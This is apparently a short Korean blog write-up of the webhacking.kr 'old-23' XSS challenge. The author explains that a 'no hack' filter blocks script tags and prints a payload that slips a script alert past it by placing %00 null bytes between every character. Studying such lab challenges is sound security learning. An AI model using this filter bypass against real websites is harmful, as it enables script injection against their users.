본문 바로가기

webhacking.kr

old-23

 

xss 문제이다 

 

 

하지만 밑에 스크립트를 넣으면 no hack 이라는 문구가 나온다

 

문자에 대한 필터링이 존재하는거 같았다

 

어떻게 우회하지 하다가 가지고 있는 지식을 총 동원해서 %00을 생각해냈다

<s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%001%00)%00;%00</s%00c%00r%00i%00p%00t%00>

 

이런식으로 하면 스크립트가 동작해 문제가 풀리게 된다

'webhacking.kr' 카테고리의 다른 글

old-22  (0) 2021.08.25
old-21  (0) 2021.08.25
old-20  (0) 2021.08.10
old-19  (0) 2021.08.10
old-18  (0) 2021.08.10